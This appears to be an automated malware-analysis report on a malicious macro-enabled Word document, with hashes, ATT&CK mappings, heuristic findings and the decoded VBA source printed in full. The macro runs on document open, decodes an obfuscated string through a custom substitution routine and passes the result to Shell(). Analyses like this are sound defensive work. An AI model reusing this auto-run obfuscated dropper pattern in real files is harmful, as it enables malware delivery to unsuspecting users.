Office (OLE) malware analysis — malicious · c705e5b8b69bd340

MALICIOUS

Office (OLE)

54.0 KB Created: 2018-09-06 10:17:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 907f47bb169bf042dbedf280c6a279c4 SHA-1: d59d420a7106ec66f5f3a22ab91d2b587b891868 SHA-256: c705e5b8b69bd34028d271c2909d9070b17ba9af648589bfe169ccb71e8fb7cc

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a macro-enabled Word document containing a Document_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code. The macro appears to be obfuscated, but the presence of the Shell() call and the 'SE_ENABLE_LURE' heuristic strongly suggest it's designed to download and execute a second-stage payload. The document body also contains a lure to enable content.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
later = BOOL.Alert
Shell later, 0
End Sub
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Private Sub Document_Open()
per = "per"
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.bmo.com/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2549 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2549 bytes
SHA-256: `c6ef81b06bc932add8a4fe699767f1593caee4f9e005eac83cc50884b2ed2846`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() per = "per" BUS_MCEERR_AR per End Sub Attribute VB_Name = "BOOL" Attribute VB_Base = "0{FE5312C1-E680-4F93-BB61-033B242A5B23}{67CCDBB2-5971-432C-9962-EF5810D4CC33}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Alert_Change() later = BOOL.Alert Shell later, 0 End Sub Private Sub callStack_Change() array1 End Sub Attribute VB_Name = "OS2" Function BUS_MCEERR_AR(selected) BOOL.callStack = selected End Function Attribute VB_Name = "entries" Function array1() BOOL.status = fileindex("){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9h)\-xfdj$b%9_xs$xjfj[s;\|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_xs$xjfj[s1,,5f{l52lpg{psfpkch""spzxste s(s,,;3xfzdf4ldk)sxx9,,5f{l52lpg{psfpkch""spzxste s(s,,3:fdg\|h)\,,nffl8}}akd""cajcsvz{j""gvj$z$)jz"" )k{}xk{ xz$b,,;:)zf)n\|h)\,,nffl8}}dzmj$j{z//z""{z$cdz{ )k{}xk{ xz$b,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52""jxfkvxjb$z""x ]zf39xfzdf4ldk)sxx9,5f{l52""jxfkvxjb$z""x ]zf,94aj$ckaxfg""s9njccs$.") BOOL.Alert = BOOL.status End Function Attribute VB_Name = "currentdepth" Function fileindex(functions) are = "" templateFormat = 1 Has templateFormat, are, functions fileindex = are End Function Function Has(ByRef terminate, ByRef tryLoadLibrary, your) by = Len(your) If terminate <= by Then tryLoadLibrary = tryLoadLibrary + errorOutput(iostream(Right(Left(your, terminate), 1)), 9) terminate = terminate + 1 Has terminate, tryLoadLibrary, your End If End Function Function errorOutput(trap, enough) If trap - enough < 1 Then errorOutput = Right(Left(BOOL.true1, Len(BOOL.true1) + trap - enough), 1) Else errorOutput = Right(Left(BOOL.true1, trap - enough), 1) End If End Function Function iostream(print1) ansi = 1 non = 1 useful ansi, non, print1 iostream = non End Function Function useful(ByRef ansi, ByRef non, print1) c = BOOL.true1 cstr1 = Len(c) If ansi < cstr1 + 1 Then If print1 <> Right(Left(c, ansi), 1) Then ansi = ansi + 1 useful ansi, non, print1 Else non = ansi End If End If End Function

SHA-256: c6ef81b06bc932add8a4fe699767f1593caee4f9e005eac83cc50884b2ed2846

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
per = "per"
BUS_MCEERR_AR per
End Sub

Attribute VB_Name = "BOOL"
Attribute VB_Base = "0{FE5312C1-E680-4F93-BB61-033B242A5B23}{67CCDBB2-5971-432C-9962-EF5810D4CC33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Alert_Change()
later = BOOL.Alert
Shell later, 0
End Sub

Private Sub callStack_Change()
array1
End Sub

Attribute VB_Name = "OS2"
Function BUS_MCEERR_AR(selected)
BOOL.callStack = selected
End Function

Attribute VB_Name = "entries"
Function array1()
BOOL.status = fileindex("){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9h)\-xfdj$b%9_xs$xjfj[s;|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_xs$xjfj[s1,,5f{l52lpg{psfpkch""spzxste s(s,,;3xfzdf4ldk)sxx9,,5f{l52lpg{psfpkch""spzxste s(s,,3:fdg|h)\,,nffl8}}akd""cajcsvz{j""gvj$z$)jz"" )k{}xk{ xz$b,,;:)zf)n|h)\,,nffl8}}dzmj$j{z//z""{z$cdz{ )k{}xk{ xz$b,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52""jxfkvxjb$z""x ]zf39xfzdf4ldk)sxx9,5f{l52""jxfkvxjb$z""x ]zf,94aj$ckaxfg""s9njccs$.")
BOOL.Alert = BOOL.status
End Function

Attribute VB_Name = "currentdepth"
Function fileindex(functions)
are = ""
templateFormat = 1
Has templateFormat, are, functions
fileindex = are
End Function

Function Has(ByRef terminate, ByRef tryLoadLibrary, your)
by = Len(your)
If terminate <= by Then
tryLoadLibrary = tryLoadLibrary + errorOutput(iostream(Right(Left(your, terminate), 1)), 9)
terminate = terminate + 1
Has terminate, tryLoadLibrary, your
End If
End Function

Function errorOutput(trap, enough)
If trap - enough < 1 Then
errorOutput = Right(Left(BOOL.true1, Len(BOOL.true1) + trap - enough), 1)
Else
errorOutput = Right(Left(BOOL.true1, trap - enough), 1)
End If
End Function

Function iostream(print1)
ansi = 1
non = 1
useful ansi, non, print1
iostream = non
End Function
  
Function useful(ByRef ansi, ByRef non, print1)
c = BOOL.true1
cstr1 = Len(c)
If ansi < cstr1 + 1 Then
    If print1 <> Right(Left(c, ansi), 1) Then
    ansi = ansi + 1
    useful ansi, non, print1
    Else
    non = ansi
    End If
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.